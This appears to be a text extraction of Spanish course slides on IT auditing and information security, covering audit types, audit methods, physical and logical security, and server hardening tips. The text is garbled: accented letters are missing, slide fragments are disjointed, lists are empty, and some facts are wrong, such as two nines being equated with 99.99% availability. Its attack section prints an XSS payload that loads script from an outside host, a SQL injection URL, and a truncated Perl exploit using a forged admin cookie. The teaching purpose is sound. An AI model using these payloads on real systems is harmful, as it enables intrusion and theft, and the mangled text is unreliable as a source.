Orgenes de la Auditora
Se remontan a:
Revisin y Diagnostico de registros de las operaciones contables de una empresa.
Posteriormente Pasamos al:
Anlisis
Verificacin
Evaluacin
De los aspectos financieros.
Posteriormente se amplio el campo de accin a:
Examinar rubros de administracin.
Revisin Integral
Luego se evoluciono a:
Anlisis de aspectos que intervienen en todas las actividades.
Por ltimo:
Se llevo a lo que se conoce como revisin integral de la organizacin
ANTECEDENTES DE LA AUDITORA
-
Comercio primitivo
Comercio por trueque
Trueque a nivel de aldea
Comercio a nivel ciudad
Comercio a nivel estado
Comercio a nivel continente
Mecanismos rudimentarios de registros
Se da inicio a los gremios
Mercados locales
Comienzan las empresas incipientes
Los escribas toman el control
Aparece la partida doble libro diario
Surge la llamada: tenedura de libros
Esta tcnica evoluciono y llego a llamarse: contabilidad cuyo objetivo es: veracidad y
confiabilidad en los datos
Actualmente la contabilidad se maneja por medios informticos
En este momento nace la necesidad de que alguien evalu estos controles
Y, con base en ese anlisis poder emitir una opinin autorizada sobre las razones de sus
resultados.
Auditor
Persona capacitada para realizar auditoras en una empresa u otras instituciones.
Es la persona que se encarga de revisar los registros, procedimientos y transacciones financieras
de una organizacin hechas por especialistas.
Auditora
LA ACCIN - Supervisin de las cuentas de una empresa, hecha por decisin de un tribunal o
instancia en particular.
Auditoras por
su lugar de
Aplicacin
Auditora Externa
Auditor no tiene
relacin directa con la
empresa
Auditora Interna
Auditora Financiera
Auditora Administrativa
Auditora Operacional
Auditoras por su rea de
Aplicacin
Auditora Integral
Auditora Gubernamental
Auditora de Sistemas
Auditora de obras
construcciones
Auditora Fiscal
Auditora de sistemas
computacionales
Auditora Laboral
Auditora Informtica
Auditora Proyectos
de Inversin
Auditora inventarios
Auditora ambiental
Auditora de sistemas
Auditora alrededor de la
computadora
Auditora de la seguridad de sistemas
computacionales
Auditora a los sistemas de redes
Auditora Integral a los centros de
cmputo
Auditora ISO-9000 a los sistemas
computacionales
Auditora Outsourcing
Auditora ergonmica de sistemas
computaciones
AUDITORIA EXTERNA
Permite: Utilizar libre albedrio para;
Principal caracterstica es
que la realizan ajenos
totalmente a la empresa.
AUDITORIA EXTERNA
Ventajas
Desventajas
Principal caracterstica
AUDITORIA INTERNA
Ventajas
Auditora Administrativa
Auditora Financiera
Se refiere al mbito especfico donde se llevan a cabo las actividades y operaciones que sern
auditadas, de acuerdo al rea de trabajo e influencia de la rama o especialidad que ser evaluada
Cumplimiento de Funciones
Auditora Operacional
Existencia
Suficiencia
Revisin sistemtica,
exhaustiva y especfica
de las actividades de
una empresa. Evala:
Eficacia
Eficiencia
Auditora Integral
Funciones Administrativas
Revisin exhaustiva,
sistemtica y global
que realiza un equipo
multidisciplinario de
profesionales a todas
las actividades y
operaciones de la
empresa para evaluar:
Resultados Conjuntos
Relaciones de Trabajo
Comunicaciones y Procedimientos
Actividades
El propsito
fundamental de este
tipo de auditora tan
especializada es
Auditar de manera
conjunta todas las:
Funciones
Auditora Gubernamental
Es la revisin exhaustiva,
sistemtica y concreta que se
realiza a todas las actividades y
operaciones de un ente
gubernamental. Evala:
Telecomunicaciones
Auditora Informtica
Redes
Mobiliario
Equipos perifricos
Y dems componentes.
Gestin informtica.
Aprovechamiento de recursos.
Esta revisin tambin aplica a la:
Medidas de seguridad
Bienes consumo o suministros
Propsito Fundamental
Auditora Informtica
Evaluar:
Procesamiento adecuado
de la informacin.
Cumplimiento de
funciones
Emisin oportuna de
reportes.
Actividades y operaciones
de empleados
involucrados en los
sistemas computacionales.
Mtodos
Tcnicas
Los avances tecnolgicos
son cada vez ms
singulares y peculiares por
lo que no es suficiente:
Herramientas
Procedimientos
Sistemas computacionales
Revisin tcnica, especializada
y exhaustiva que se realiza a:
Auditora
Informtica
Auditora con
la
computadora
Software
Informacin de la
empresa
Auditora sin
la
computadora
Evala:
Seguridad y prevencin
Contingencias
Procedimientos para adquirir
nuevo hardware y software
Contratacin de nuevo personal
Planeacin
Se toma de carcter
administrativa y
operacional. Auditora
cuya aplicacin esta
enfocada a:
Direccin
Control de un Centro
Auditora a la Gestin
Informtica
Evaluar el cumplimiento
de las funciones y
actividades del
funcionario empleados
usuarios del rea de
sistemas
Mantenimiento y
explotacin de los
sistemas equipos e
instalaciones
Auditoria ms
especializada y
concreta.
Enfocada a la actividad
y operacin de los
sistemas
computacionales.
Evaluacin tcnica y
especializada.
Funcionamiento y uso
correcto del equipo de
computo.
Auditora en Sistemas
Computacionales
Hardware
Software y perifricos
asociados
Evala:
Arquitectura fsica y
componentes de
hardware
Desarrollo y uso de
software de operacin.
Lenguajes de
desarrollo.
Auditora alrededor de la
computadora
sus sistemas
actividades
funcionamientos
reas y el personal.
Auditora de la seguridad
de los sistemas
computacionales
Actividades de los
funcionarios
Revisin exhaustiva,
tcnica y especializada a la
seguridad de un sistema
a:.
Acciones preventivas y
Correctivas que se tengan.
PLANES DE
CONTINGENCIA.
Medidas de proteccin de
la informacin
Arquitectura
Topologa
Protocolos de
Comunicacin
Conexiones
Accesos
Revisin exhaustiva,
especfica y
especializada que se
realiza a los sistemas
computacionales de
redes de una empresa.
Administracin
Revisa
Instalacin
Privilegios
Funcionalidad
Aprovechamiento
Revisin del software
institucional
Recursos informticos
Informacin de las
operaciones
Bases de datos
compartidas
Software y Hardware de
la red
Equipos Perifricos.
Apoyo para el procesamiento de informacin
de la empresa.
Red de servicio de la empresa
Desarrollo correcto de las funciones de sus
reas, personal y usuarios.
Administracin del sistema.
Manejo y control de sistemas operativos.
Lenguajes.
Se Evalua
Programas.
Software de aplicacin.
Administracin y control de proyectos
Adquisicin de hardware y software
las normas
Administracin y control de proyectos.
polticas
Integracin y uso de los recursos informticos.
estndares
Existencia y cumplimiento de
procedimientos del
sistema
personal
usuarios del centro
de cmputo.
Revisin exhaustiva,
sistemtica y
especializada que
realizan nicamente
los auditores
especializados y
certificados en las
normas y
procedimientos ISO9000
Evaluar
Dictaminar
Auditora Outsourcing
El propsito
fundamental de esta
revisin es:
Revisin exhaustiva,
sistemtica y
especializada que se
realiza para evaluar la
calidad en el servicio de
asesora o
procesamiento externo
de informacin que
proporciona una
empresa.
Objetivo
Certificar
Que la calidad de los
sistemas
computacionales se
apegue a los
requerimientos del ISO9000
Revisar confiabilidad.
Oportunidad.
Suficiencia.
Asesora de los prestadores del
servicio.
Cumplimiento de las funciones y
actividades.
Calidad
Es la revisin tcnica,
especfica y
especializada que se
realiza para evaluar :
Eficiencia
Auditora Ergonmica
de Sistemas
Computacionales
evalua
Bienestar confort
comodidad que necesita un
usuario.
Deteccin de problemas y
repercusiones con la salud
fsica y bienestar del
usuario.
Realizar una revisin
independiente
Evaluar el cumplimiento de
planes
AUDITOR INFORMTICO
PERSONAL INTERNO
Conocimientos especializados en tecnologas de informacin verificacin
del cumplimiento de controles internos, normativa y procedimientos
establecidos por la direccin informtica y la direccin general para los
sistemas de informacin.
DIFERENCIAS
Direccin
Divisin del trabajo
Asignacin de responsabilidad y autoridad
Establecimiento de estndares y Mtodos
Perfiles de puestos
Controles para prevenir y evitar amenazas, riesgos y contingencias que puedan incidir en los
sistemas.
Controles sobre la seguridad fsica del rea de sistemas
Controles sobre la seguridad lgica de los sistemas
Controles sobre la seguridad de las bases de datos
Controles sobre la seguridad de los sistemas computacionales
Controles sobre la seguridad del personal de informtica
Controles sobre la seguridad de las telecomunicaciones de informtica
Controles sobre la seguridad de las redes
AUDITORA INFORMTICA
-
Regular Informtica:
o Se refiere a la calidad de la informacin existente en las bases de datos de los
sistemas informticos que se utilizan para controlar los recursos, su entorno y los
riesgos asociados a esta actividad.
Especial Informtica:
o El anlisis de los aspectos especficos relativos a las bases de datos de los sistemas
informticos en que se haya detectado algn tipo de alteracin o incorrecta
operatoria de los mismos.
Recurrente Informtica:
Toma de Contacto
Validacin de la Informacin
Desarrollo de la Auditora
Fase de Diagnstico
Presentacin de Conclusiones
Formacin del Plan de Mejoras (Recomendaciones).
Entrevistas
Tres formas existentes hacen que el auditor logre relacionarse con el personal auditado.
-
La solicitud de la informacin requerida, esta debe ser concreta y debe ser de la materia de
responsabilidad del auditado.
En la entrevista no se sigue un plan predeterminado ni un mtodo estricto de sometimiento
a un cuestionario.
La entrevista es un medio por el que el auditor usar metodologas las que han sido
establecidas previamente con la finalidad de encontrar informacin concreta.
La importancia que la entrevista tiene en la auditora se debe a que la informacin que recoge es
mayor, se encuentra mejor elaborada, y es ms concreta que las que pueden proporcionar los
medios tcnicos, o los cuestionarios. La entrevista personal entre el auditor y el personal
auditado, es basada en una serie de preguntas especficas en las que el auditado deber
responder directamente.
Checklist
El uso del Checklist goza de opiniones compartidas, debido a que descalifica en cierta forma al
auditor informtico, ya que al hacer uso de este tipo de cuestionarios el auditor incurre en la falta
de profesionalismo. Por eso es mejor que se de un procesamiento de la informacin a fin de
llegar a respuestas que tengan coherencia y as poder definir correctamente los puntos ms
dbiles y los ms fuertes; el profesionalismo del auditor se refleja en la elaboracin de preguntas
muy bien analizadas, las mismas que se hacen de forma no muy rigurosa.
Estos cuestionarios deben ser contestados oralmente, ya que superan en riqueza a cualquier otra
forma de obtencin de informacin.
El personal auditado generalmente se encuentra familiarizado con el perfil tcnico y lo percibe
fcilmente, as como los conocimientos del auditor. De acuerdo a esta percepcin denota el
respeto y el prestigio que debe poseer el auditor.
Por ello es muy importante tener elaboradas las listas de preguntas, pero an es mucho ms
importante la forma y el orden en que estas se formulan, ya que no serviran de mucho si es que
no se desarrollan oportuna y adecuadamente.
Puede ser que alguna pregunta deba repetirse, pero en este caso deber ser formulada en forma
diferente, o su equivalencia. Con la ayuda de este mtodo los puntos contradictorios sern
notorios de forma ms rpida. Cuando se dan casos en los que existe contradiccin, entonces se
har una reelaboracin de preguntas para complementar a las formuladas previamente y as
poder conseguir consistencia.
Estos Checklist responden a dos tipos de razonamiento para su calificacin o evaluacin:
-
Debido a los diferentes tipos de auditora informtica el auditor debe conocer bien el rea que va
a auditar y slo de esta forma podr realizar un buen trabajo; esto quiere decir que si el Auditor va
a realizar una Auditora de Redes el tendr que ser especialista de Redes o por lo menos conocer
muy bien el manejo y funcionamiento de las redes e incluso entre diferentes Sistemas Operativos
y as con todos los tipos de Auditoras
Seguridad Informtica:
La seguridad permite garantizar que los recursos informticos de una compaa estn disponibles
para cumplir sus propsitos, es decir, que no estn daados o alterados por circunstancias o
factores externos, es una definicin til para conocer lo que implica el concepto de seguridad
informtica. Entendindose como peligro o dao todo aquello que pueda afectar su
funcionamiento directo o los resultados que se obtienen del mismo.
La seguridad es un tema muy importante para cualquier empresa, este o no conectada a una red
pblica. Los niveles de seguridad que se pueden implementar son muchos y depender del usuario
hasta donde quiera llegar.
La seguridad informtica y de datos en una empresa dista mucho de simplemente tener un
Firewall. Se aborda un proceso de seguridad recomendado a utilizar por lo menos las siguientes
herramientas:
-
Segn expertos hasta hoy en da todava no se ha creado un sistema que sea 100% seguro y
explican que un sistema se puede definir como seguro cuando tiene las tres caractersticas
principales como son: Integridad (Autorizacin para que la informacin sea modificada),
Confidencialidad (Informacin asequible para autorizados), Disponibilidad (Disponible solo cuando
se necesite).
En otras palabras la seguridad puede entenderse como aquellas reglas tcnicas o actividades
destinadas a prevenir, proteger y resguardar lo que es considerado como susceptible de robo,
prdida o dao, ya sea de manera personal, grupal o empresarial.
En este sentido, es la informacin el elemento principal a proteger, resguardar y recuperar dentro
de las redes empresariales.
La seguridad informtica de una empresa es primordial debido a la existencia de personas ajenas a
la informacin (hackers), quienes buscan la mnima oportunidad para acceder a la red, modificar,
borrar datos o tomar informacin que puede ser de vital importancia para la empresa.
Tales personajes pueden, incluso, formar parte del personal administrativo o de sistemas, de
cualquier compaa; de acuerdo con expertos en el rea, ms de 70% de las violaciones a los
recursos informticos se realiza por el personal interno, debido a que ste conoce los procesos,
metodologas o tiene acceso a la informacin sensible de la empresa que puede afectar el buen
funcionamiento de la organizacin, pudiendo representar un dao con valor de miles o millones
de dlares.
En el momento de instalar un sistema y haber invertido con mecanismos de seguridad, se debera
plantear la pregunta: cul debe ser el nivel de seguridad de la empresa? La respuesta va a
depender de la importancia que tenga la informacin y los recursos que compongan el sistema. De
tal forma que se necesite asegurar pero no ser lo mismo con un sistema informtico bancario,
que con los que contengan informacin que afecte a la seguridad del estado, o que aquellos
destinados al desarrollo de aplicaciones informticas comerciales, o simples programas para
computadores personales del hogar.
Se debe establecer polticas de seguridad como un factor importante para la empresa, pudiendo
ser el monitoreo de la red, los enlaces de telecomunicaciones, respaldar datos, para establecer los
niveles de proteccin de los recursos.
Es recomendable que las polticas se basen en los siguientes puntos:
-
SEGURIDAD FSICA
Es muy importante ser consciente que por ms que la empresa sea la ms segura desde el punto
de vista de ataques externos, Hackers, virus, etc.; la seguridad de la misma ser nula si no se ha
previsto como combatir un incendio o algn tipo de desastre natural.
La seguridad fsica es uno de los aspectos ms olvidados a la hora del diseo de un sistema
informtico. La Seguridad Fsica consiste en la aplicacin de barreras fsicas y procedimientos de
control, como medidas de prevencin y contramedidas ante amenazas a los recursos e
informacin confidencial. Refirindose de esta manera a los controles y mecanismos de seguridad
dentro y alrededor del Centro de Cmputo as como los medios de acceso remoto; implementado
para proteger el hardware y medios de almacenamiento de datos.
TIPOS DE DESASTRES
Este tipo de seguridad est enfocado a cubrir las amenazas ocasionadas tanto por el hombre como
por la naturaleza del medio fsico en que se encuentra ubicada la seccin de procesamiento de
datos.
Las principales amenazas que se prevn en la seguridad fsica son:
-
A veces basta recurrir al sentido comn para darse cuenta que cerrar una puerta con llave o
cortar la electricidad en ciertas reas siguen siendo tcnicas vlidas en cualquier entorno.
A continuacin se analizan los peligros ms importantes que se corren en un centro de
procesamiento; con el objetivo de mantener una serie de acciones a seguir en forma eficaz y
oportuna para la prevencin, reduccin, recuperacin y correccin de los diferentes tipos de
riesgos.
-
Incendios
Inundaciones
Condiciones Climatolgicas
Instalaciones Elctricas
Acciones Hostiles
-
Robo
Fraude
Sabotaje
SEGURIDAD LGICA
Luego de ver como nuestro sistema puede verse afectado por la falta de Seguridad Fsica, es
importante recalcar que la mayora de los daos que puede sufrir un centro de cmputo no ser
sobre los medios fsicos sino contra informacin almacenada y procesada.
El activo ms importante que se posee una empresa es la informacin, y por lo tanto deben existir
tcnicas, ms all de la seguridad fsica, que la aseguren. Estas tcnicas las brinda la Seguridad
Lgica.
Es decir que la Seguridad Lgica consiste en la aplicacin de barreras y procedimientos que
resguarden el acceso a los datos y slo se permita acceder a ellos a las personas autorizadas para
hacerlo.
Los objetivos que plantean este tipo de seguridades son:
La bsqueda del tipo de control adecuado, dada la naturaleza del proceso de actividades
depende del sistema. Adems algunas veces el controlar algn tipo de error o irregularidad
es mucho ms caro que las prdidas que estos producen.
Un atributo a considerar cuando se evala la efectividad del control es si el control
previene, detecta o corrige errores.
Otro atributo a tener en cuenta es el nmero de componentes necesarios para realizar el
control.
Finalmente han de considerarse el nmero de subsistemas afectados por el control. Esta
funcin comprueba si se trata de un componente compartido, es decir, que realiza
actividades en varios subsistemas.
El auditor se preocupa en conseguir que los sistemas se encuentren en total operatividad, para
lograr esto se deben realizar una serie de Controles Tcnicos Generales de Operatividad, y dentro
de ellos unos Controles Tcnicos Especficos de Operatividad, los que deben estar desarrollados
previamente.
compatibles y comunes.
Utilizacin de Guardias
Utilizacin de Detectores de Metales
Utilizacin de Sistemas Biomtricos (identifican a la persona por lo que es manos, ojos,
huellas digitales y voz)
Proteccin Electrnica
Identificacin y Autentificacin
Roles
Transacciones
Limitaciones a los Servicios
Modalidad de Acceso
Ubicacin y Horario
Control de Acceso Interno
SEGURIDAD INFORMATICA
Existen varias razones por las que a todos los niveles no se le ha dado a suficiente importancia:
1.
2.
3.
4.
Qu es el riesgo?
Riesgo = vulnerabilidades * amenazas
Si no hay amenazas no hay riesgo Si no hay vulnerabilidades no hay riesgo
Factores que se consideraban fuentes de amenazas:
El nivel de riesgo es suficientemente alto como para empezar a pensar en la seguridad como algo
imprescindible
Farming
SPAM
Pishing
Cajeros automticos
ETC.
Ingeniera social
El ataque que ms preocupa hoy en da a las grandes organizaciones, sobre todo en el sector de
banca online es, con diferencia, el PISHING:
redes WiFi basado en RC4 que puede ser descifrado si se consigue una captura de trfico
suficientemente grande.
El Coste de la seguridad
El esfuerzo tanto econmico como humano de los Departamentos de Seguridad debe buscar
siempre cuatro objetivos:
1. Disponibilidad: Se consideran sistemas aceptables a partir de dos nueves, esto es:
disponibles el 99,99% del tiempo. La inversin por cada nueve extra es siempre muy
elevada.
2. Confidencialidad: Seguridad keep the good giys in
3. Integridad: Seguridad Keep the bad guys out
4. Cumplimiento de la legalidad: LOPD, Sarbanes-Oxley, ISO17799
El esfuerzo econmico en seguridad es imposible de medir pero como ste debe ser siempre
proporcional al riesgo de perdidas, que SI ES MEDIBLE, si es posible hacer estimaciones razonables
TECNOLOGAS
Qu tecnologas existen y cul es su estado actual?
Desde el punto de vista empresarial existen dos posibles enfoques para clasificar los sistemas de
seguridad:
1. Segn coste:
a. Software libre: Linux, Snort, Nessus, Ethereal, etc. Suele ser difcil implantar este
tipo de sistemas salvo que haya verdaderos problemas presupuestarios.
b. Sistemas propietarios: Microsoft, Sun, IBM, Symantec, ISS, Checkpoint, Trend, etc.
Gran calidad debida a la competencia
2. Desde el punto de vista de su utilidad:
a. Keep the good guys in: VPN, PKI, RAS, Radius, Tacacs+, Single Sing On, etc.
b. Keep the bad guys out: AntiVirus, FW, IPS, IDS, ADS, etc.
Qu grado de implantacin tiene cada una?
Receptor
Emisor
Atacante
INTERRUPCION
El mensaje no puede llegar a su destino, un recurso del sistema es destruido
o temporalmente inutilizado.
Este es un ataque contra la Disponibilidad
Ejemplos: Destruccin de una pieza de hardware, cortar los medios de
comunicacin o deshabilitar los sistemas de administracin de archivos.
Receptor
Emisor
Atacante
INTERCEPCION
Una persona, computadora o programa sin autorizacin logra el acceso a un
recurso controlado.
Es un ataque contra la Confidencialidad.
Ejemplos: Escuchas electrnicos, copias ilcitas de programas o datos,
escalamiento de privilegios.
Receptor
Emisor
Atacante
MODIFICACION
La persona sin autorizacin, adems de lograr el acceso, modifica el
mensaje.
Este es un ataque contra la Integridad.
Ejemplos: Alterar la informacin que se transmite desde una base de datos,
modificar los mensajes entre programas para que se comporten diferente.
Receptor
Emisor
Atacante
FABRICACION
Una persona sin autorizacin inserta objetos falsos en el sistema.
Es un ataque contra la Autenticidad.
Ejemplos: Suplantacin de identidades, robo de sesiones, robo de
contraseas, robo de direcciones IP, etc...
Es muy difcil estar seguro de quin esta al otro lado de la lnea.
Receptor
Emisor
Atacante
GERENTES
Para que esperar
Si gastas ms dinero en caf que en Seguridad Informtica, entonces vas a ser
hackeado, es ms, mereces ser hackeado
La mayora de las empresas incorporan medidas de seguridad hasta que han tenido
graves problemas. para que esperarse?
Siempre tenemos algo de valor para alguien
Razones para atacar la red de una empresa:
$$$, ventaja econmica, ventaja competitiva, espionaje poltico, espionaje
industrial, sabotaje,
Empleados descontentos, fraudes, extorsiones, (insiders).
Espacio de almacenamiento, ancho de banda, servidores de correo (SPAM),
poder de cmputo, etc
Objetivo de oportunidad.
Siempre hay algo que perder:
Cunto te cuesta tener un sistema de cmputo detenido por causa de un incidente
de seguridad?
Costos econmicos (perder oportunidades de negocio).
Costos de recuperacin.
Costos de reparacin.
Costos de tiempo.
Costos legales y judiciales.
Costos de imagen.
Costos de confianza de clientes.
Perdidas humanas (cuando sea el caso).
Qu hacer?
Los altos niveles de la empresa tienen que apoyar y patrocinar las iniciativas de
seguridad.
Las polticas y mecanismos de seguridad deben de exigirse para toda la empresa.
Niveles de Hackers:
Nivel 3: (ELITE) Expertos en varias reas de la informtica, son los que usualmente
descubren los puntos dbiles en los sistemas y pueden crear herramientas para
explotarlos.
Nivel 2: Tienen un conocimiento avanzado de la informtica y pueden obtener las
herramientas creadas por los de nivel 3, pero pueden darle usos ms preciso de
acuerdo a los intereses propios o de un grupo.
Nivel 1 o Script Kiddies: Obtienen las herramientas creadas por los de nivel 3, pero
las ejecutan contra una vctima muchas veces sin saber lo que estn haciendo.Son
los que con ms frecuencia realizan ataques serios.
Cualquiera conectado a la red es una vctima potencial, sin importar a que se dedique, debido a
que muchos atacantes slo quieren probar que pueden hacer un hack por diversin.
ADMINISTRADORES DE T.I.
ADMINISTRADORES DE TI:
Son los que tienen directamente la responsabilidad de vigilar a los otros roles.
(aparte de sus sistemas).
Hay actividades de seguridad que deben de realizar de manera rutinaria.
Obligados a capacitarse, investigar, y proponer soluciones e implementarlas.
Tambin tiene que ser hackers: Conocer al enemigo, proponer soluciones
inteligentes y creativas para problemas complejos.
Qu se debe asegurar ?
Siendo que la informacin debe considerarse como un recurso con el que cuentan las
Organizaciones y por lo tanto tiene valor para stas, al igual que el resto de los activos, debe estar
debidamente protegida.
Contra qu se debe proteger la Informacin ?
La Seguridad de la Informacin, protege a sta de una amplia gama de amenazas, tanto de orden
fortuito como destruccin, incendio o inundaciones, como de orden deliberado, tal como fraude,
espionaje, sabotaje, vandalismo, etc.
Qu se debe garantizar?
Confidencialidad: Se garantiza que la informacin es accesible slo a
aquellas personas autorizadas a tener acceso a la misma.
Internas
Amenazas
Externas
Proteccin de la Informacin
Confidencialidad
Integridad
Disponibilidad
Aspectos Legales
Requerimiento bsico
Recursos Econmicos
Tiempo
Anlisis de Riesgos
Modelo de Gestin
Activos
Amenazas
Impactos
Vulnerabilidades
Reduce
Riesgos
Funcin
Correctiva
Reduce
Funcin
Preventiva
Poltica de Seguridad:
Uso de herramientas
Involucra
Cumplimiento de Tareas por parte de
personas
Plan de Contingencias
Uso de herramientas
Outsourcing de Auditora
Herramientas:
Copias de Resguardo
Control de Acceso
Encriptacin
Antivirus
Barreras de Proteccin
Uso de Estndares
Estndares Internacionales
-
ORGANIZACION DE LA SEGURIDAD
Clasificacin de la Informacin
reas Seguras
Controles generales
Tares de acondicionamiento
Administracin de la red
CONTROL DE ACCESO
Controles Criptogrficos
CUMPLIMIENTO
- Motivaciones: Ranking, reto personal, robo de datos, pruebas (pen test), etc.
Ataques Internos
Suplantacin de identidad
Keylogging - Keycatching
Keycatcher:
Ataques Externos
SQL Injection
Exploits
Robo de Identidad
SPAM
VIRUS
Troyanos
XSS:
http://docs.info.apple.com/article.html?artnum=';a=document.createElement('script');a.src='http:
//h4k.in/i.js';document.body.appendChild(a);//\';alert(1)//%22;alert(2)//\%22;alert(3)//--%3E
SQL Injection:
http://www.sitiovulnerable.com/index.php?id=10 UNION SELECT TOP 1 login_name FROM
admin_login-Ejemplo de un exploit en PERL:
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
$host=shift;
if ($host eq "") {
print "Usage: webeye-xp.pl <host name>\n";
exit;
}
my $browser = LWP::UserAgent->new();
my $resp = $browser->get("http://$host/admin/wg_user-info.ml","Cookie","USER_ID=0;
path=/;");
$t = $resp->content;
#print $t;
";
COMO NOS DEFENDEMOS?
Debemos crear una lista de mandamientos que debemos seguir al pie de la letra.
No olvidarse que el hecho de no cumplir con alguno de estos mandamientos inevitablemente
caeremos en un mayor riesgo para los servicios que queremos proteger.
LOS MANDAMIENTOS MAS IMPORTANTES DE SEGURIDAD
Siempre respetar las polticas de seguridad
Siempre tener nuestros servicios actualizados a la ltima versin conocida estable
Utilizar mecanismos de criptografa para almacenar y transmitir datos sensibles
Cambiar las claves cada cierto tiempo
Auto-auditar nuestros propios servicios. Autoatacarnos para saber si somos o no
vulnerables
- Si ejecutan algn servidor de base de datos, permitir solamente comunicacin con interfaz
loopback y no dejar sin contrasea las bases de datos.
- En lo posible no utilizar servicios como:
- WEBMIN
- phpMyAdmin
- Interfaces WEB en routers o dispositivos de red
UN POCO MAS DE SEGURIDAD CON APACHE Y PHP
Apache. En httpd.conf activar las siguientes directivas:
ServerTokens Prod
ServerSignature Off
ServerAdmin <direccion@decorreo.com>
habilitar mod_security y mod_rewrite
PHP .En php.ini
php_expose=off
esconde php
mode_safe=on
evita que se ejecuten funciones como system(), passthru(), exec(), etc.
evitar scripts con phpinfo();
Algunos ejemplos:
Direccin: http://www.sitioweb.com/config.php
<?php
/*Variables base de datos*/
$sys['db_host'] = "localhost";
$sys['db_username'] = "root";
$sys['db_password'] = "123";
$sys['db_database'] = "base_de_datos";
echo "<center>ESTA PAGINA ES PRIVADA";
?>
Utilizar claves de tipo WPA2. Como segunda opcin WPA y en el peor de los casos WEP
(128 y 64 bits)
Habilitar el control de acceso por MAC. Son fciles de clonar pero pone una barrera ms
Cambiar los puertos por defecto de los servicios necesarios en el router (ej: http a 1000)
Desactivar DHCP. Utilizar slo IP manuales dentro de rangos poco convencionales. (Ej:
90.0.10.0 90.0.10.254)
Cambiar regularmente las claves Wi-Fi (tanto administracin como clave de red).
NESSUS www.nessus.org